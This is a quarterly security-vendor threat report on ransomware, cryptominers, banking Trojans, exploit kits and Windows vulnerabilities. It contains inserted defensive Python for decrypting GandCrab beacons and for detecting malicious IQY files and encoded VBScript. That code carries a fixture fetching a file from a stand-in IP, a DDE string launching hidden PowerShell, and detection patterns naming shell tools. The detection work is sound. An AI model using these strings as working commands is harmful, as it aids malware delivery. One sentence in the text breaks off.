McAfee Labs Threats Report December 2018

Top Stories of the Quarter

- Underground Forums Boost the Effectiveness of Cybercriminals
- Cryptomining Boom Times Continue
- Exploit Kits Add Support for Vulnerabilities, Ransomware
- Targeted Attacks Motivated by Cyber Espionage

Introduction

Welcome to the McAfee Labs Threats Report, December 2018. In this edition, we highlight the notable investigative research and trends in threat statistics and observations gathered by the McAfee Advanced Threat Research and McAfee Labs teams in Q3 of 2018.

We are very excited to present to you new insights and a new format in this report. We are dedicated to listening to our customers to determine what you find important and how we can add value. In recent months we have gathered more threat intelligence, correlating and analyzing data to provide more useful insights into what is happening in the evolving threat landscape. McAfee is collaborating closely with MITRE Corporation in extending the techniques of its MITRE ATT&CK knowledge base, and we now include the model in our report. We have just started to refine our process and reports. You can expect more from us, and we welcome your feedback.

Although the aftermath of takedowns of underground markets was still apparent in Q3, many other underground markets have eagerly filled the gaps. With the services on offer, the effectiveness of cybercriminals is increasing. During this quarter we also noticed greater activity from the GandCrab ransomware family. Using an affiliate program, demonstrating agile development, and mixing with other cybercrime services such as exploit kits have resulted in a big wave of attacks from this family.

The third quarter was also highlighted by major security conferences. Representatives of the McAfee Advanced Threat Research team shared insights from their research at several of these events. At DEF CON we demonstrated how an attacker could manipulate medical devices. During Black Hat USA, the team released research into code reuse by North Korean malware families that revealed previously undiscovered links.

We also welcomed many customers and partners as we shared our latest research at the McAfee MPOWER conferences in Las Vegas, Sydney, Tokyo, and Rome. During this quarter, we have stayed busy analyzing threats, welcoming new researchers to the team, and especially publishing our findings. You can read our results on our blogs page and our team's page.

We hope you enjoy the new format and we look forward to your reactions.

—Raj Samani, Chief Scientist and McAfee Fellow
Twitter: @Raj_Samani

—Christiaan Beek, Lead Scientist
Twitter: @ChristiaanBeek

Table of Contents

- Underground Forums Boost the Effectiveness of Cybercriminals
- Ransomware Families Decline in Number
- Cryptomining Boom Times Continue
- Mobile Threats Fueled by Fake Apps
- Banking Trojans Turn to Uncommon File Types
- Exploit Kits Add Support for Vulnerabilities, Ransomware
- Vulnerabilities Open Door to Shellcode, Privilege Escalation
- Targeted Attacks Motivated by Cyber Espionage
- Threats Statistics

This report was researched and written by: Christiaan Beek, Steve Grobman, Alexandre Mundo Alguacil, Carlos Castillo, Taylor Dunton, John Fokker, Tim Hux, Niamh Minihane, Lee Munson, Eric Peterson, Marc Rivero, Thomas Roccia, Raj Samani, Craig Schmugar, ReseAnne Sims, Dan Sommer, Bing Sun

Underground Forums Boost the Effectiveness of Cybercriminals

KEY TOPIC: Dark web marketplaces, generally accessible via TOR, focus on selling narcotics and other illicit goods. These markets also offer hacking tools, hackers for hire, and data records. The accessibility of these marketplaces to a large public makes them a force to be reckoned with. Stolen digital data, which drives much of the profits, will continue to be a key motivator. As long as there are markets, we must secure our data.

Dark web markets

The ripple effect of the takedowns of the Hansa and AlphaBay dark web markets was still apparent in Q3. Competing marketplaces, such as Dream Market, Wall Street Market, and Olympus Market, eagerly filled the gap left by law enforcement actions last year.

Wall Street and Dream Markets have become the largest marketplaces. Olympus Market, which was well on its way to being one of the top markets, suddenly disappeared in Q3. There is speculation that the disappearance was an exit scheme initiated by the market's administrators to steal money from their own vendors and customers.

The McAfee Advanced Threat Research team has noticed a shift in dark web platforms. Several individual sellers have moved away from large markets and have opened their own specific marketplaces. They hope to fly under the radar of law enforcement and build a trusted relationship with their customers without the fear of a quick exit by the market owners. This shift has sparked a new line of business: defiant website designers who offer to build hidden marketplaces for aspiring vendors. Other vendors are moving away from the TOR network, choosing platforms such as Telegram to offer their goods and services.

Underground hacker forums

Different from dark web markets, underground hacker forums are less accessible to the public and focus on cybercrime-related topics. McAfee researched several of these meeting places in Q3 to determine the hot topics.

Leaked user credentials: Credential abuse is one of the most popular topics on the underground scene, and the large data breaches we read about help maintain this popularity. The use of valid accounts makes it child's play for cybercriminals to access and take over an individual's personal life. Cybercriminals often show an interest in email accounts because these are regularly used to restore login credentials for other online services. Password reuse, not enabling two-factor authentication, and failing to change passwords on a regular basis are the main factors that make these attacks so effective.

CVE discussions: We have seen numerous mentions of Common Vulnerabilities and Exposures. The most recently published CVEs were hot topics in discussions of browser exploit kits (RIG, Grandsoft, and Fallout) and of ransomware, especially GandCrab. In the English-speaking, less technical underground forums we observed several discussions of old CVE implementations in familiar tools such as Trillium MultiSploit. These threads show that cybercriminals are eager to weaponize both new and old vulnerabilities. The popularity of these topics in underground forums should warn organizations to make vulnerability management a priority in their cyber resilience plans.

Credit card-stealing malware targeting e-commerce sites: Large-scale credit card theft has shifted from point-of-sale systems to (third-party) payment platforms on large e-commerce sites. Groups such as Magecart have been responsible for many headlines in recent months, successfully skimming thousands of credit card details directly from the victims' websites. These breaches have fueled an underground demand for malicious tools such as MagentoCore that are being used to steal credit card data by injecting malicious JavaScript code into vulnerable Magento platforms.

Credit card shops: In spite of a decrease in point-of-sale fraud such as skimming, recent big credit card thefts maintain a steady supply of "fresh" card details offered on "dump sites" such as JokerStash, Trump's Dumps, and Blackpass.

Figure 1. Trump's Dumps login page.

Credit card companies and e-commerce sites are making good strides on fraud detection, for example, by implementing geographic IP location checks for online purchases. Every action triggers a reaction, however; we have noticed an increased demand for compromised machines that are in the same zip code as stolen credit card information. Underground markets that sell remote desktop protocol (RDP) access make good use of this.

RDP shops

Early in Q3 we published an extensive report on online platforms that sell RDP access to hacked machines. Criminals offer logins to computer systems worldwide, ranging from home to medical to even government systems. RDP shops remained popular throughout this quarter and continue to serve criminals looking to commit credit card fraud, cryptomining, ransomware, and account fraud. RDP shops such as Blackpass provide one-stop access to all the tools used to commit fraud; in addition to RDP access they sell social security numbers, bank details, and online accounts.

Figure 2. RDP shop Blackpass offers online accounts and credit cards possibly connected to one of the Magecart breaches.

Fraudsters continue to demand RDP-accessible systems with several active online accounts. Criminals can use this access to order goods online through their victims' accounts and have them shipped elsewhere. RDP continues to be an Achilles heel for many organizations, judging by the number of targeted ransomware attacks, such as SamSam, BitPaymer, and GandCrab, that leverage RDP as an entry method.

Ransomware-as-a-service

On underground forums there is a strong interest in the leading ransomware-as-a-service families such as GandCrab. These developers are forming strategic partnerships with other essential services, such as crypter services and exploit kits, to better serve their customers and increase infection rates. At the end of Q3 we published research on how the latest version of GandCrab partnered with the relatively new crypter service NTCrypt. This partnership was formed after NTCrypt won a crypter contest launched by the group behind GandCrab. A crypter service provides malware obfuscation to evade antimalware security products.

Figure 3. The NTCrypt-GandCrab partnership announcing a special price for GandCrab users.

Android malware: We saw an increase in discussions of mobile malware, mostly targeting Android and focused on botnets, banking fraud, ransomware, and bypassing two-factor authentication.

Other malware and botnets: These two subjects form the backbone of cybercrime; they are regular topics for discussion in the cybercriminal underground. In addition to threads on well-known malware families and large botnets, we have seen numerous discussions of small, unnamed botnets, cryptocurrency mining malware, and remote access Trojans. Apart from GandCrab and its partnered services, no other specific malware families stood out in underground discussions.

Distributed denial of service: DDoS attack methods and booter/stresser services remained hot topics among young cybercriminals; we saw these mostly discussed in English-speaking, less technical forums.

Ransomware Families Decline in Number

Although we have seen a decline in the number of unique families during recent months, ransomware remained active in Q3. The decline in new families may be due to many ransomware actors switching to a more lucrative business model: cryptomining.

One of the most active ransomware families in Q3 was GandCrab. Due to its affiliate scheme, several participants launched their campaigns when new versions were released. Many versions appeared as the developers tried to stay ahead of the security industry's responses. The sheer volume of GandCrab samples contributed to the increase in new ransomware in Q3.

[Chart: New ransomware families, by quarter, Q3 2017 to Q3 2018. Source: McAfee Labs, 2018.]

[Chart: New ransomware, by quarter, Q4 2016 to Q3 2018. Source: McAfee Labs, 2018.]

Some of the changes we observed in GandCrab:

- Added to the Fallout exploit kit to boost infections
- Used the CVE-2018-8440 vulnerability (a patch was released in September) to boost infections
- Added a random five-character extension to encrypted files
- Added the ability to kill processes related to Word, Excel, SQL Server, Oracle, PowerPoint, Outlook, and others

The biggest change we noticed was the increase in size of the ransom payment. GandCrab Version 5 requires the victim to pay US$2,400 for the decryption key. Past versions required $1,000.

Similarities in Version 5 with previous versions:

- Does not infect Russian users
- Contains a hardcoded list of URLs that it contacts to send the victims' system information
- The ransom/payment/decryption site is still on the dark web at hxxp://gandcrabmfe6mnef[.]onion
- Uses the hardcoded key "jopochlen" to encrypt victims' information with the RC4 algorithm

The Advanced Threat Research team wrote an extensive report on GandCrab Version 5 and its changes.

Another active ransomware family in Q3 was Scarab, which released six new variants along with numerous updates to current variants (new extensions added to encrypted files, new ransom notes, etc.). The ransomware does not appear to target a specific sector or region. New variants in Q3 included Scarab-CyberGod (August).

Figure 4. The Advanced Threat Research team mapped malware and other attacks in Q3 to the MITRE ATT&CK framework. We have removed techniques that were not present. The darker the background, the more frequently the technique was used. Tactics shown include Persistence, Privilege Escalation, Defense Evasion, Credential Access, and Discovery. Techniques shown: Startup Items, Process Injection, Hooking, File and Directory Discovery, Scheduled Task, Bypass User Account Control, Input Capture, Registry Run Keys/Startup Folder, Disabling Security Tools, DLL Search Order Hijacking, File Deletion.
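As an added example (not code from the McAfee report, and not GandCrab's own code), the following Python shows what a hardcoded RC4 key means for a defender: RC4 is a symmetric stream cipher, so anyone holding a captured check-in can strip the encryption with the same key "jopochlen" the report names. The RC4 routine is the standard algorithm; the check-in plaintext and its field names are constructed for the example and do not reproduce GandCrab's real layout, and the printable-text plausibility check is this example's own assumption.

```python
"""Added example, not code from the McAfee report or from GandCrab itself.

RC4 is symmetric: a malware family that ships one hardcoded key gives
defenders that key too. The beacon field layout below is constructed."""

GANDCRAB_V5_KEY = b"jopochlen"   # hardcoded key named in the report


def rc4(key: bytes, data: bytes) -> bytes:
    """Standard RC4: key scheduling builds permutation S, then the
    pseudo-random generation loop XORs a keystream byte into each byte."""
    S = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:                          # pseudo-random generation
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def decrypt_beacon(blob: bytes, key: bytes = GANDCRAB_V5_KEY) -> bytes:
    """RC4 encryption and decryption are the same keystream XOR."""
    return rc4(key, blob)


def looks_like_beacon(blob: bytes, key: bytes = GANDCRAB_V5_KEY) -> bool:
    """Heuristic (assumption of this example, not GandCrab's format): a
    check-in decrypted with the right key is printable ASCII key=value
    pairs joined by '&'. Wrongly keyed data is pseudo-random and fails."""
    plain = decrypt_beacon(blob, key)
    if not plain or any(b < 0x20 or b > 0x7E for b in plain):
        return False
    text = plain.decode("ascii")
    return "=" in text and "&" in text


if __name__ == "__main__":
    # Constructed check-in; field names are illustrative, not GandCrab's.
    fake = b"pc_user=alice&pc_name=WS01&pc_group=WORKGROUP&ransom_id=0123abcd"
    wire = rc4(GANDCRAB_V5_KEY, fake)          # what a network capture holds
    print(wire.hex())
    print(decrypt_beacon(wire))                # recovered with the known key
    print(looks_like_beacon(wire), looks_like_beacon(wire, b"wrongkey"))
```

The same routine applies to any sample in the family as long as the key does not change between versions, which is why a hardcoded key is worth recording in detection content: it turns an opaque C2 blob into searchable victim metadata.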

Cryptomining Boom Times Continue

KEY TOPIC: Coin miner malware hijacks systems to create ("mine") cryptocurrency without victims' consent or awareness. New coin miner threats have jumped massively in 2018.

Mining cryptocurrency via malware is one of the big stories of 2018. Total "coin miner" malware has grown more than 4,000% in the past year.

[Chart: New coin miner malware, by quarter, Q4 2016 to Q3 2018 (y-axis 0 to 4,500,000). Source: McAfee Labs, 2018.]

Cryptominers will take advantage of any reliable scenario. Some security researchers discovered that unofficial repositories of the open-source media player Kodi have served a modified add-on that delivers cryptominer malware. This operation started in

Security researcher Remco Verhoef discovered a Mac OS threat later named OSX.Dummy, which was distributed on cryptomining chat groups. The exploitation is simple, requiring victims to execute a one-line command in the OSX terminal to download and execute the payload. The actor wrote messages on Slack, Telegram, and Discord channels suggesting users download software to fix crypto problems. The fake software executes with a single line in Bash. The users essentially infected their own devices instead of falling victim to an unknown exploit or an exploit kit. In execution, OSX.Dummy opens a reverse shell to a malicious server, giving an attacker access to the compromised system.

Another campaign takes advantage of the vulnerability CVE-2018-14847, exploiting unpatched MikroTik routers. Security researcher Troy Mursch detected more than 3,700 compromised devices serving as miners. The campaign primarily targeted North America and Brazil.

We would not usually think of using routers or IoT devices such as IP cameras or video recorders as cryptominers because their CPUs are not as powerful as those in desktop and laptop computers. However, due to the lack of proper security controls, cybercriminals can benefit from volume over CPU speed. If they can control thousands of devices that mine for a long time, they can still make money.

Figure 5. MITRE ATT&CK framework. The darker the background, the more frequently the technique was used. Tactics shown: Execution, Persistence, Privilege Escalation, Defense Evasion, Discovery, Command and Control. Techniques shown: Execution through Module Load, Local Job Scheduling, Scheduled Task, Third-Party Software, Registry Run Keys/Startup Folder, Startup Items, Hooking, Process Injection, Bypass User Account Control, Query Registry, Data Obfuscation, Uncommonly Used Port.

Mobile Threats Fueled by Fake Apps

Overall, new mobile malware declined by 24% in Q3, and McAfee mobile security customers reported 36% fewer infections in the quarter. In spite of the downward trend, the mobile security landscape produced some unusual threats in Q3. New threats ranged from a fake "cheats" app for the Fortnite game that installed malware, to mobile banking Trojans and apps that served unwanted advertisements. We observed an attack targeting members of the Israel Defense Forces that installed fake dating apps to infect their devices. The fake apps exfiltrated data including location and contact lists, listened to phone calls, and used the camera.

[Chart: Global mobile malware infection rates (percentage of mobile customers reporting infections), by quarter, to Q3 2018. Source: McAfee Labs, 2018.]

[Chart: New mobile malware, by quarter, to Q3 2018. Source: McAfee Labs, 2018.]

[Chart: Regional mobile malware infection rates (percentage of mobile customers reporting infections), Q4 2017 to Q3 2018, for Africa, Asia, Australia, Europe, North America, and South America. Source: McAfee Labs, 2018.]

In Q3 the McAfee Mobile Research team detected a threat that infected at least 5,000 devices. Android/TimpDoor spreads via phishing, using text messages to trick victims into downloading and installing a fake voice message app that allows cybercriminals to use infected devices as network proxies without users' knowledge. If the fake application is installed, a background service starts a SOCKS proxy that redirects all network traffic from a third-party server via an encrypted connection through a secure shell tunnel, allowing potential access to internal networks and bypassing network security mechanisms such as firewalls and network monitors.

Devices running TimpDoor could serve as mobile backdoors for stealthy access to corporate and home networks because the malicious traffic and payload are encrypted. Worse, a network of compromised devices could also be used for more profitable purposes such as sending spam and phishing emails, performing ad click fraud, or launching distributed denial-of-service attacks.

Figure 6. The fake voice-message app Android/TimpDoor. The malicious app appears to be a legitimate voice application, but the buttons and functions are fake.

Figure 7. One of the most interesting characteristics of Android/TimpDoor is the capability to keep the SSH connection open.

The app has an alarm to keep the connection established and constantly upload information regarding the device.

Cisco's Talos group uncovered a campaign that infected 13 iPhones with a malicious mobile device manager. The infection method is still unknown; the attackers would have required physical access or social engineering techniques to deploy the device managers.

Figure 8. The infection workflow and capabilities. Source: Cisco Talos Intelligence Group.

The attackers used BOptions sideloading techniques to inject a dynamic library and add features to installed legitimate applications. This attack reminds us that development and framework environments are also vulnerable if they are not properly secured.

Figure 9. MITRE ATT&CK framework. The darker the background, the more frequently the technique was used. Techniques shown, by tactic:
- Initial Access: Spearphishing Attachment, Spearphishing Link, Spearphishing via Service
- Persistence: Dylib Hijacking
- Defense Evasion: Access Token Manipulation, Code Signing
- Discovery: Account Discovery, Application Window Discovery, Browser Bookmark Discovery, File and Directory Discovery, System Owner/User Discovery, System Service Discovery, System Time Discovery
- Collection: Audio Capture, Automated Collection, Clipboard Data, Data from Information Repositories, Data from Local System, Email Collection, Input Capture, Screen Capture
- Exfiltration: Automated Exfiltration, Data Compressed, Data Encrypted, Data Transfer Size Limits, Exfiltration Over Alternative Protocol, Exfiltration Over Command and Control Channel, Exfiltration Over Other Network Medium, Exfiltration Over Physical Medium, Scheduled Transfer
- Command and Control: Commonly Used Port, Remote File Copy, Standard Application Layer Protocol

Banking Trojans Turn to Uncommon File Types

Banking malware remained a constant threat during the year due to the effectiveness of campaigns and the profits that cybercriminals can enjoy. In Q3 we observed an increase in uncommon file types used in spam campaigns. Those attacks relied on bypassing email protection systems, which are configured to stop and analyze common Office, archive, scripting, and other files. This quarter, we observed IQY files (an Excel web query format) sent in separate waves that delivered different malware families to infected devices. These campaigns prompted users to click on emails while using conventional social engineering phrases: "photos sent," "payment," "please confirm." These campaigns accounted for around 500,000 emails sent worldwide.

Figure 10. The infection chain employs a combination of IQY files plus DDE and PowerShell to deliver Ursnif or Bleboh malware. Diagram nodes: spam campaign; IQY files; IQY file queries special URL for script file; PowerShell uses DDE technique; Trojan sends IQY file; checks if infected system is in Japan; downloads and executes Ursnif malware.

In Q3 we observed many campaigns using convincing emails, focused on their selected sectors and enticing users to click on them.

Financial institutions have added protections in recent years to protect their customers. One effective method is two-factor authentication for operations such as transferring funds to other accounts or logging into bank accounts. In Q3, the Advanced Threat Research team observed a well-known banking malware family that had updated its "web injects" to include two-factor operations to attack certain financial companies.
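As an added example (not from the report and not from any McAfee product), here is a Python scanner for the IQY attachments that start the chain above. An IQY is a small text file: a query type line, a version line, the URL Excel fetches, then optional Key=Value lines. The scanner parses that format, flags queries that pull a file from an unknown or IP-literal host over plain HTTP, and checks the text Excel receives back for a DDE command launch of the kind that hands off to PowerShell. The allow-list, both sample files and the sample response body are constructed for the example; the file-extension and DDE patterns are this example's own assumptions.

```python
"""Added example, not code from the McAfee report: scanner for IQY (Excel
Web Query) attachments and for the content the query pulls back.

The allow-list and samples are constructed; nothing here is a real artifact."""
import re
from urllib.parse import urlparse

# Constructed samples: a "photos sent" lure and a legitimate internal query.
SAMPLES = {
    "photos_sent.iqy": "WEB\n1\nhttp://203.0.113.10/1.dat\n",
    "quarterly.iqy": ("WEB\n1\nhttps://reports.corp.example/data?range=Q3\n"
                      "\nSelection=EntirePage\nFormatting=None\n"),
}
ALLOWED_HOSTS = {"reports.corp.example"}   # assumption: hosts the business uses

# A cell beginning with '=' is a formula; 'cmd|...' after it is a DDE call.
DDE_RE = re.compile(r"=\s*(cmd|powershell|msexcel|mshta|rundll32)\b.*?\|", re.I)


def parse_iqy(text):
    """Return (query_type, version, url, options) from IQY text."""
    lines = [l.strip() for l in text.splitlines() if l.strip()]
    if len(lines) < 3 or lines[0].upper() != "WEB":
        raise ValueError("not a WEB query file")
    options = dict(l.split("=", 1) for l in lines[3:] if "=" in l)
    return lines[0].upper(), lines[1], lines[2], options


def assess_iqy(text, allowed_hosts=ALLOWED_HOSTS):
    """Return a list of findings for one IQY file; empty means nothing odd."""
    try:
        _, _, url, _ = parse_iqy(text)
    except ValueError as e:
        return [str(e)]
    u = urlparse(url)
    host = u.hostname or ""
    findings = []
    if u.scheme != "https":
        findings.append(f"non-https scheme: {u.scheme}")
    if re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}", host):
        findings.append(f"IP-literal host: {host}")
    if host not in allowed_hosts:
        findings.append(f"host not on allow-list: {host}")
    if re.search(r"\.(dat|txt|exe|hta|js|vbs)$", u.path, re.I):
        findings.append(f"query target looks like a file, not a page: {u.path}")
    return findings


def scan_query_result(body):
    """Return DDE launch fragments found in text returned by the IQY URL."""
    return [m.group(0) for m in DDE_RE.finditer(body)]


if __name__ == "__main__":
    for name, text in SAMPLES.items():
        print(name, assess_iqy(text) or "clean")
    # Constructed response body of the kind a malicious IQY pulls back.
    body = "=cmd|' /C powershell -w hidden -c iex(...)'!A0\n"
    print(scan_query_result(body))
```

Run at the mail gateway, the first function decides whether an IQY should reach a mailbox at all; the second is for the sandbox that actually follows the URL, since the file itself is harmless until Excel fetches and evaluates the query result.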

Figure 11. A web inject file for the Zeus Panda malware. Source: Cofense.

Zeus Panda often changes its web injects to include new techniques to bypass the latest protections applied by the financial sector.

In Q3, some well-known malware families updated their versions with slight modifications. The banking Trojan Kronos became popular in 2014, when it was discovered. This year, a new version renamed Osiris hosted its control server on the TOR network and was sold on the underground market. Another new campaign targeted users in Germany with malicious .doc files carrying macros that downloaded Kronos. Kronos was also delivered in Q3 by the RIG exploit kit, which previously dropped Zeus Panda.

Banking malware has long been popular in Brazil. In Q3, McAfee detected a new family targeting the country: CamuBot attempts to camouflage itself as a security module required by the banks it targets. CamuBot shares few similarities with other Brazilian malware families; instead it has taken on characteristics from non-Brazilian families such as TrickBot, Ursnif, Dridex, and Qakbot. This is a major change in malware targeting Brazilians; most threats are less sophisticated compared with the banking malware affecting other continents. Organized cyber gangs in Brazil are very active in targeting their own population. They have learned a lot from their Eastern European peers and have adapted their malware to include techniques used elsewhere.

Figure 12. MITRE ATT&CK framework. The darker the background, the more frequently the technique was used. Techniques shown, by tactic:
- Execution: Exploitation for Client Execution, Distributed Component Object Model, PowerShell, Windows Management Instrumentation, Local Job Scheduling, Scripting
- Persistence: Bootkit, Hooking, Kernel Modules and Extensions, Office Application Startup, Registry Run Keys/Startup Folder, Service Registry Permissions Weakness
- Defense Evasion: Code Signing, DCShadow, File Deletion, Modify Registry, Process Injection, Software Packing
- Credential Access: Hooking, Input Capture
- Discovery: Application Window Discovery, File and Directory Discovery, Network Service Scanning, Peripheral Device Discovery, Process Discovery, Query Registry, Security Software Discovery, System Information Discovery, System Time Discovery
- Lateral Movement: Pass the Hash, Remote Desktop Protocol
- Collection: Clipboard Data, Email Collection, Input Capture
- Exfiltration: Data Compressed, Exfiltration Over Alternative Protocol
- Command and Control: Data Encoding, Uncommonly Used Port

Exploit Kits Add Support for Vulnerabilities, Ransomware

Exploit kits are the delivery vehicles for many cybercrime operations. Some can remain in business, while others are taken out by law enforcement actions. In Q3 we found two new exploit kits on the scene.

Fallout: This exploit kit was discovered in August. It takes advantage of flaws in Adobe Flash Player and Microsoft Windows. A successful infection will allow an attacker to download malware onto the victim's computer. This exploit kit shares similarities with the Nuclear exploit kit. Fallout was found during an investigation at some Japanese organizations, although it targets no specific region. CVE-2018-4878 and CVE-2018-8174 are the only two vulnerabilities included in this kit, which used the latter flaw to spread GandCrab Version 5.

The following chart is based on telemetry from McAfee Global Threat Intelligence. It shows the distribution of four samples of the GandCrab Version 5 ransomware we measured in late September and early October. These samples were most likely spread via the Fallout exploit kit. The chart displays a typical exploit kit infection rate, with a high level of hits at the beginning and a rapid decrease over a short time. This is a common business model for exploit kits; a customer pays either by installations or for a fixed time. The September 28 increase was probably due to the release of another round of samples by affiliates.

[Chart: McAfee GTI reports of four GandCrab ransomware version 5 samples over 10 days, 24 September to 3 October 2018. One sample hash fragment survives in the legend: b129ce07fadb006486953439ce0092651fd7a6.]

Underminer: This exploit kit was discovered in July. It protects its own code and control server traffic with RSA encryption and takes advantage of flaws in Microsoft Internet Explorer and Flash Player to infect users with a range of malware, including cryptominers and bootkits. The exploit kit targets users in the Asia-Pacific region. Two vulnerabilities were added to this kit in Q3: CVE-2018-4878 (Adobe Flash Player 28.0.0.137 use-after-free remote code execution) and CVE-2018-8174 (Windows VBScript Engine remote code execution vulnerability; for more, see the next section).

Figure 13. MITRE ATT&CK framework. The darker the background, the more frequently the technique was used. Techniques shown, by tactic:
- Initial Access: Drive-By Compromise, Exploit Public-Facing Application
- Execution: Exploitation for Client Execution, Scripting
- Privilege Escalation: Exploitation for Privilege Escalation, Bypass User Account Control
- Defense Evasion: Bypass User Account Control, Exploitation for Defense Evasion

Vulnerabilities Open Door to Shellcode, Privilege Escalation

In Q3 three vulnerabilities stood out for their use by new malware families or campaigns.

Windows VBScript Engine Remote Code Execution Vulnerability (CVE-2018-8174). This flaw was patched in May but was exploited in Q3 by "Operation Personality Disorder." The attackers used malicious RTF documents containing VBScript to exploit a flaw in Internet Explorer and launch shellcode. The code dropped a backdoor payload and gave control of the infected systems. The campaign was carried out by the Cobalt Gang, whose alleged leader was arrested in Spain this year.

This vulnerability was added in Q3 to two new exploit kits, Fallout and Underminer. The flaw was also used to infect users with GandCrab Version 5 via Fallout. The threat actors behind the malvertising campaign used legitimate advertising sites to redirect victims to a landing page containing the exploit kit. The landing page contained Base64-encoded VBScript code that is decoded by a JavaScript function. The decoded code executes shellcode by exploiting the defect in the VBScript engine. The shellcode then downloads the payload, which loads GandCrab into memory on the infected system.

Windows ALPC Elevation of Privilege Vulnerability (CVE-2018-8440). This was patched in September. The zero-day flaw made headlines after the security researcher who found the defect posted proof-of-concept details to Twitter and GitHub in late August, causing Microsoft to include a patch in the September updates. The flaw allowed anyone with local access rights to gain system privileges. The vulnerability was used to infect users with GandCrab by exploiting a privilege escalation flaw in Windows, allowing the ransomware to gain elevated privileges
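As an added example (not code from the report, and not the Fallout kit's own landing page), the Python below does offline what the landing page's JavaScript does at run time: it finds long Base64 runs in HTML, decodes them, and scores the result for VBScript keywords, so a web proxy log or a sandboxed page capture can be triaged without executing any script. The HTML sample and the VBScript body inside it are constructed and do not exploit anything; the keyword list and the three-keyword threshold are this example's own assumptions.

```python
"""Added example, not code from the McAfee report or from the Fallout kit.

Finds Base64-encoded VBScript embedded in HTML, the way an exploit-kit
landing page hides it for a JavaScript decoder. Sample HTML is constructed;
keyword list and threshold are assumptions of this example."""
import base64
import re

B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
VBS_KEYWORDS = ("Dim ", "Class ", "End Class", "Sub ", "End Sub",
                "CreateObject", "ReDim", "Class_Terminate", "Set ")

# Constructed VBScript body: harmless, only there to carry the keywords.
_FAKE_VBS = (
    "Dim arr(1)\r\nClass Foo\r\n  Private Sub Class_Terminate\r\n"
    "    Set ref = Me\r\n  End Sub\r\nEnd Class\r\n"
    "Set o = CreateObject(\"WScript.Shell\")\r\n"
)
# Constructed page: an encoded script blob plus a binary image blob as decoy.
SAMPLE_HTML = (
    "<html><body><script>var p='"
    + base64.b64encode(_FAKE_VBS.encode()).decode()
    + "';eval(atob(p));</script>"
    + "<img src='data:image/png;base64,"
    + base64.b64encode(bytes(range(256))).decode()
    + "'></body></html>"
)


def decode_candidates(html):
    """Yield (encoded, decoded_text) for each Base64 run that is real text."""
    for m in B64_RUN.finditer(html):
        token = m.group(0)
        try:
            raw = base64.b64decode(token + "=" * (-len(token) % 4), validate=True)
            text = raw.decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue                    # binary data or invalid Base64
        if all(c.isprintable() or c in "\r\n\t" for c in text):
            yield token, text


def score_vbscript(text):
    """Count distinct VBScript keywords present in the decoded text."""
    return sum(1 for k in VBS_KEYWORDS if k in text)


def find_encoded_vbscript(html, min_keywords=3):
    """Return decoded blobs whose keyword score reaches the threshold."""
    return [text for _, text in decode_candidates(html)
            if score_vbscript(text) >= min_keywords]


if __name__ == "__main__":
    for blob in find_encoded_vbscript(SAMPLE_HTML):
        print("Base64-encoded VBScript found:\n" + blob)
```

The decoy image blob decodes to bytes that are not ASCII and is dropped, which is the usual source of false positives for a regex-only rule; decoding before matching is what makes the check cheap to run across a proxy's HTML captures.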
